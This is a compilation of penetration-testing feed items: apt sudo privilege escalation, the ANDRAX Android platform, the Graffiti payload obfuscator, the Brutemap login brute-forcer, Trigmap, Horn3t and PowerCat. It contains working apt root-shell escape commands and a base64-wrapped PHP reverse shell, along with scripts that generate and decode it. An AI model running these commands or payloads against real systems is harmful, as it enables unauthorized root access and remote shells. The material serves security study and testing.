Linux for Pentester: APT Privilege Escalation

In this article, we'll talk about APT (apt-get) functionality, learn how helpful the apt command is for Linux penetration testing, and see how apt can be abused to obtain a higher-privileged shell.
Table of Content: Introduction to APT (apt-get); Major operations performed using APT (apt-get); Exploiting APT (apt-get) sudo rights; Lab setups for privilege escalation…
The post Linux for Pentester: APT Privilege Escalation appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
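
The teaser above only names the technique. As an added example (not code from the Hacking Articles post), the POSIX shell snippet below triages "sudo -l" output for apt or apt-get entries that run as root and prints the two escapes documented for those binaries: the changelog subcommand hands its output to the pager, where "!/bin/sh" spawns a shell, and the APT::Update::Pre-Invoke option runs an arbitrary command before "update". The sudo output it parses is a constructed sample; the user name raj, the host name ubuntu and the rule set in it are assumptions, and the escapes only apply when the sudo rule does not restrict arguments.

```sh
#!/bin/sh
# Added example, not from the Hacking Articles post: triage "sudo -l" output for
# apt/apt-get entries that run as root and print the documented escapes.

# Constructed sample of "sudo -l" output (user, host and rules are assumptions).
SAMPLE_SUDO_L='Matching Defaults entries for raj on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User raj may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/apt
    (ALL) NOPASSWD: /usr/bin/less'

# apt_sudo_entries "<sudo -l output>": print every apt or apt-get binary that a
# "(root)" or "(ALL)" rule allows, one per line, with the NOPASSWD tag stripped.
apt_sudo_entries() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*\((root|ALL)[^)]*\)/ {
            line = $0
            sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "", line)   # drop "(root)" / "(ALL : ALL)"
            sub(/^NOPASSWD:[[:space:]]*/, "", line)                # drop the NOPASSWD tag
            if (line ~ /(^|\/)apt(-get)?([[:space:]]|$)/) print line
        }'
}

# apt_escape_hint "<binary>": the two well-known escapes; both work for apt and
# apt-get when the sudo rule allows the binary without argument restrictions.
apt_escape_hint() {
    printf '  sudo %s changelog apt    # output goes to the pager; type !/bin/sh there\n' "$1"
    printf '  sudo %s update -o APT::Update::Pre-Invoke::=/bin/sh\n' "$1"
}

# Demo on the constructed sample. On a live box feed it "$(sudo -n -l 2>/dev/null)".
apt_sudo_entries "$SAMPLE_SUDO_L" | while IFS= read -r bin; do
    echo "sudo allows $bin as root:"
    apt_escape_hint "$bin"
done
```

The parser deliberately ignores rules for other users and any rule that pins apt to specific arguments; if "sudo -l" shows something like "(root) /usr/bin/apt-get install *", check the rule by hand before assuming either escape applies.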

ANDRAX v3 – The First And Unique Penetration Testing Platform For Android Smartphones

ANDRAX is the first and unique penetration testing platform for Android smartphones. Thanks to Jessica Helena, who made ANDRAX v3 possible.

What is ANDRAX
ANDRAX is a penetration testing platform developed specifically for Android smartphones. ANDRAX runs natively on Android, so it behaves like a common Linux distribution, but more powerful than a common distribution!

Why is Android so powerful?
Simple: everyone has a smartphone and spends all their time with it, so we can blend in easily in the middle of everyone. The processor architecture of most Android smartphones is ARM, a modern and robust architecture; with touch screens we can run the tools with great agility and take advantage of the graphical interface of Android; and we can get in almost anywhere with our smartphones.

In technical terms, ANDRAX and NetHunter should never be compared: ANDRAX is a penetration testing platform for Android smartphones, while NetHunter is just a Debian environment running in a chroot.

Termux is not our enemy. Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android. ANDRAX and Termux have a similar design and share many libs and GNU/Linux resources. But Termux is not a penetration testing platform; it is software to bring the basic tools found in a Debian environment. Penetration tests are not something basic, but advanced techniques that involve advanced tools and an advanced environment to conduct good tests. So you can install many tools manually in Termux, but it would be extremely difficult to optimize and configure them to get 100% of the potential required for penetration testing. Termux runs without root privileges, and this makes it very difficult to use advanced tools.
Features and Tools
Tool list
Information Gathering: Whois, Bind DNS tools, Dnsrecon, Raccoon, DNS-Cracker, Firewalk
Scanning: Nmap - Network Mapper, Masscan, SSLScan, Amap
Packet Crafting: Hping3, Nping, Scapy, Hexinject, Ncat, Socat
Network Hacking: ARPSpoof, Bettercap, MITMProxy, EvilGINX2
WebSite Hacking: 0d1n, Wapiti3, Recon-NG, PHPSploit, Photon, XSSer, Commix, SQLMap, Payloadmask, AbernathY-XSS
Password Hacking: Hydra, Ncrack, John The Ripper, CRUNCH
Wireless Hacking: VMP Evil AP, Aircrack-NG Tools, Cowpatty, MDK3, Reaver
Exploitation: MetaSploit Framework, RouterSploit Framework, Getsploit, OWASP ZSC, Rop-TOOL
More…

Advanced Terminal: advanced and professional terminal emulator for hacking!
Dynamic Categories Overlay (DCO): beautiful tools category system
Advanced IDE: complete support for many programming languages
Information Gathering: tools for initial information about the target
Scanning: tools for the second stage, scanning
Packet Crafting: tools to craft network packets
Network Hacking: tools for network hacking
WebSite Hacking: tools for website and web app hacking
Password Hacking: tools to break passwords
Wireless Hacking: tools for wireless hacking
Exploitation: tools to develop and launch exploits
More info on the official site.
Download ANDRAX

Link: http://feedproxy.google.com/~r/PentestTools/~3/3jIpU7zeiJg/andrax-v3-first-and-unique-penetration.html

UPDATE: Kali Linux 2019.2 Release

PenTestIT RSS Feed
Kali Linux 2019.2, the latest and greatest Kali Linux release, is now officially available! This is the second 2019 release, following Kali Linux 2019.1, which was made available in February. This new release focuses mainly on Kali Linux NetHunter updates, including 13 new images and added device support, along with…
The post UPDATE: Kali Linux 2019.2 Release appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-2-release/

Graffiti – A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

NOTE: Never upload payloads to online checkers.

Graffiti is a tool to generate obfuscated one-liners to aid in penetration testing situations. Graffiti accepts the following languages for encoding: Python, Perl, Batch, PowerShell, PHP, Bash. Graffiti will also accept a language that is not currently on the list and store the one-liner in a database.

Features
Graffiti comes with a database into which every encoded payload is inserted, so that end users can view already created payloads for future use. The payloads can be encoded using the following techniques: Xor, Base64, Hex, ROT13, Raw.
Some features of Graffiti include:
- Terminal drop-in access, with the ability to run external commands
- Ability to create your own payload JSON files
- Ability to view cached payloads inside the database
- Ability to run the database in memory for quick deletion
- Terminal history and saving of terminal history
- Auto tab completion inside the terminal
- Ability to securely wipe the history files and database file
- Multiple encoding techniques, as mentioned above

Usage
Graffiti comes with a built-in terminal; when you pass no flags to the program it drops into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. To get help, you just have to type help or ? (both print the same table):

[Graffiti v0.1 ASCII banner]
no arguments have been passed, dropping into terminal
type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
root@graffiti:~/graffiti# ?
Command                        Description
help/?                         Show this help
external                       List available external commands
cached                         Display all payloads that are already in the database
list/show                      List all available payloads
search <phrase>                Search for a specific payload
use <payload> <coder>          Use this payload and encode it using a specified coder
info <payload>                 Get information on a specified payload
check                          Check for updates
history                        Display command history
exit/quit                      Exit the terminal and running session
encode <script-type> <coder>   Encode a provided payload

Graffiti also comes with command line arguments for when you need a payload encoded quickly:

usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                   [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                   [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                   [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H]
                   [-W] [--memory] [-mC COMMAND [COMMAND ...]]

optional arguments:
  -h, --help            show this help message and exit
  -c CODEC, --codec CODEC
                        specify an encoding technique (*default=None)
  -p PAYLOAD, --payload PAYLOAD
                        pass the path to a payload to use (*default=None)
  --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                        create a payload file and store it inside of ./etc/payloads (*default=None)
  -l, --list            list all available payloads by path (*default=False)
  -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                        pass your own personal payload to use for the encoding (*default=None)
  -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                        pass a listening address to use for the payload (if needed) (*default=None)
  -lP LISTENING-PORT, --lport LISTENING-PORT
                        pass a listening port to use for the payload (if needed) (*default=None)
  -u URL, --url URL     pass a URL if needed by your payload (*default=None)
  -vC, --view-cached    view the cached data already present inside of the database
  -H, --no-history      do not store the command history (*default=True)
  -W, --wipe            wipe the database and the history (*default=False)
  --memory              initialize the database into memory instead of a .db file (*default=False)
  -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                        pass more external commands, this will allow them to be accessed inside of the terminal; commands must be in your PATH (*default=None)

Encoding a payload is as simple as this:

root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
Encoded Payload:
--------------------------------------------------
php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
--------------------------------------------------

Installation
On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable on your system (you must be running either Linux or Mac for it to work), all you have to do is run:
./install.sh
This will install Graffiti onto your system and allow you to run it from anywhere.

Bugs and issues
If you happen to find a bug or an issue, please create an issue with details here, and thank you ahead of time!
Download Graffiti

Link: http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html
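
The base64 "encoding" shown in the Graffiti run above is worth looking at from both sides. The following POSIX shell snippet is an added example, not Graffiti's own code: it rebuilds the wrapped one-liner from the page's LHOST and LPORT and decodes it again the way an analyst would when the stub turns up in a log or a shell history. The PHP body is assumed to be what Graffiti's socket_reverse payload expands to (it is exactly what the page's base64 decodes to); the page's own encoded output is embedded for comparison.

```sh
#!/bin/sh
# Added example, not Graffiti's own code: rebuild the base64 "encoding" Graffiti
# applies to its PHP socket reverse shell and show that it reverses just as easily.

# Wrapped one-liner exactly as printed in the page's Graffiti run (LHOST 127.0.0.1, LPORT 9065).
PAGE_EXAMPLE="php -r 'exec(base64_decode(\"JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7\"));'"

# php_socket_reverse LHOST LPORT: the raw PHP one-liner. The body is assumed to be what
# Graffiti's socket_reverse payload expands to; it is what the page's example decodes to.
php_socket_reverse() {
    printf '$sock=fsockopen("%s",%s);exec("/bin/sh -i <&3 >&3 2>&3");' "$1" "$2"
}

# b64_wrap PAYLOAD: base64-encode the payload (no line wrapping) and embed it in the
# php -r 'exec(base64_decode("..."));' stub that decodes and runs it on the target.
b64_wrap() {
    enc=$(printf '%s' "$1" | base64 | tr -d '\n')
    printf "php -r 'exec(base64_decode(\"%s\"));'" "$enc"
}

# b64_unwrap ONELINER: what an analyst does with such a stub from a log or a shell
# history: pull the base64 out and decode it. (macOS: use base64 -D instead of -d.)
b64_unwrap() {
    printf '%s\n' "$1" | sed -n 's|.*base64_decode("\([A-Za-z0-9+/=]*\)").*|\1|p' | base64 -d
}

# Demo: re-encode with the page's LHOST/LPORT and compare with the page's output.
rebuilt=$(b64_wrap "$(php_socket_reverse 127.0.0.1 9065)")
[ "$rebuilt" = "$PAGE_EXAMPLE" ] && echo "re-encoding matches the page's output"
echo "decoded: $(b64_unwrap "$PAGE_EXAMPLE")"
```

Base64 here is an encoding, not obfuscation in any meaningful sense: the stub itself (php -r ... base64_decode) is a strong detection signature, and the plaintext, including the callback address and port, is one sed-and-base64 away. Treat the wrapped form as a transport convenience, not as evasion.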

Brutemap – Tool That Automates Testing Accounts To The Site’s Login Page

Brutemap is an open source penetration testing tool that automates testing accounts against a site's login page, based on dictionary attack. With it, you no longer need to search for other bruteforce tools, and you no longer need to ask "what CMS is this?" just to find the form parameters, because Brutemap finds them automatically. Brutemap also comes with an attack method that makes it easy to do account checking or to test forms with the SQL injection authentication bypass technique.

Installation
Brutemap uses Selenium to interact with the website, so you need to install a WebDriver for Selenium first. See here. If you have git installed, you only need to clone the repository:
$ git clone https://github.com/brutemap-dev/brutemap.git
And install the required modules:
$ pip install -r requirements.txt

Usage
For basic use:
$ python brutemap.py -t http://www.example.com/admin/login.php -u admin -p default
To display a list of available options:
$ python brutemap.py -h
You can find examples of Brutemap usage here. For more information about available options, see the User's manual.

Homepage: https://brutemap-dev.github.io
Download: .zip (latest version) or .tar.gz (latest version).
Issue tracker: https://github.com/brutemap-dev/brutemap/issues
User's manual: https://github.com/brutemap-dev/brutemap/wiki
Download Brutemap

Link: http://feedproxy.google.com/~r/PentestTools/~3/HEi_Ynm05Wg/brutemap-tool-that-automates-testing.html

Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scans and, especially, to collect information into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient, thanks to the optimized Nmap algorithms.

Details
Trigmap can perform several tasks using the Nmap Scripting Engine (NSE):
- Port scan
- Service and version detection
- Web resources enumeration
- Vulnerability assessment
- Common vulnerabilities test
- Common exploits test
- Dictionary attacks against active services
- Default credentials test

Usage
Trigmap can be used in two ways:
Interactive mode: trigmap [ENTER], and the script does the rest
Non-interactive mode: trigmap -h|--host [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases]
If you want to see the help: trigmap --help
For more screenshots see the relative directory of the repository.

Dir Hierarchy

Customization
It is possible to customize the script by changing the values of the variables at the beginning of the file. In particular you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).

################ PARAMETERS ################
GENERAL_USER_LIST='general_user_wordlist_short.txt'
WIN_USER_LIST='win_user_wordlist_short.txt'
UNIX_USER_LIST='unix_user_wordlist_short.txt'
SHORT_PASS_LIST='fasttrack.txt'
LONG_PASS_LIST='rockyou.txt'
################ NMAP SETTING ################
# PE (echo req), PP (timestamp-request)
# you can add a port on every ping scan
NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'
NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'
SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'
SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'
SCRIPT_ARGS="userdb=$GENERAL_USER_LIST,passdb=$SHORT_PASS_LIST"
CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN

Twin Brother
This project is very similar to Kaboom, but with a different philosophy: it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is its portability and efficiency, but it is recommended to use both tools to scan the targets, so as to gather more evidence with different tools (redundancy and reliability).
Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

Horn3t – Powerful Visual Subdomain Enumeration At The Click Of A Mouse

Horn3t is your number one tool for exploring subdomains visually. Building on the great Sublist3r framework (or extensible with your favorite one), it searches for subdomains and generates picture previews. Get a fast overview of your target with HTTP status codes, add custom found subdomains, and directly access found URLs with one click.
- Recon your targets at blazing speed
- Enhance your productivity by focusing on interesting-looking sites
- Enumerate critical sites immediately
- Sting your target

Installation
1. Install Google Chrome
2. Install requirements.txt with pip3
3. Install requirements.txt of sublist3r with pip3
4. Put the directory within the web server of your choice
5. Make sure to have the right permissions
6. Run horn3t.py
Or alternatively use the install.sh file with Docker. Afterwards you can access the web portal at http://localhost:1337

Todo
- Better scaling on Firefox
- Add Windows Dockerfile
- Direct Nmap support per click on a subdomain
- Direct Dirb support per click on a subdomain
- Generate PDF reports of found subdomains
- Assist with subdomain takeover

Credits
- aboul3la - the creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of Sublist3r.
- TheRook - the bruteforce module was based on his script subbrute.
- bitquark - Subbrute's wordlist was based on his research dnspop.
Tested on Windows 10 and Debian with Google Chrome/Chromium 73
Download Horn3t

Link: http://www.kitploit.com/2019/05/horn3t-powerful-visual-subdomain.html

PowerCat -A PowerShell Netcat

PowerCat takes its name from PowerShell Netcat: it is a new version of netcat in the form of a PowerShell script. In this article, we will learn about PowerCat, a PowerShell tool for exploiting Windows machines.
Table of Content: Requirement & installation; Testing PowerShell communication; Bind shell; Execute shell; Tunnelling or port forwarding…
The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/powercat-a-powershell-netcat/

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set up our own web server for penetration testing on Ubuntu 18, which has been updated with new features.
Table of Content: Requirement; Web server configuration; Apache; PHP; MySQL; phpMyAdmin; FTP; SSH; Nmap
Requirement: Ubuntu 18
Web Server Configuration: A web server is a program that uses HTTP to serve users with the files forming web pages, in response to requests transmitted by their HTTP clients. The term can also refer to the dedicated computers and appliances that run such programs.
Install Apache: First, we will install Apache…
The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago, and today MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled List of Adversary Emulation Tools. This is a major update, and this post is about the changes I personally see in this…
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/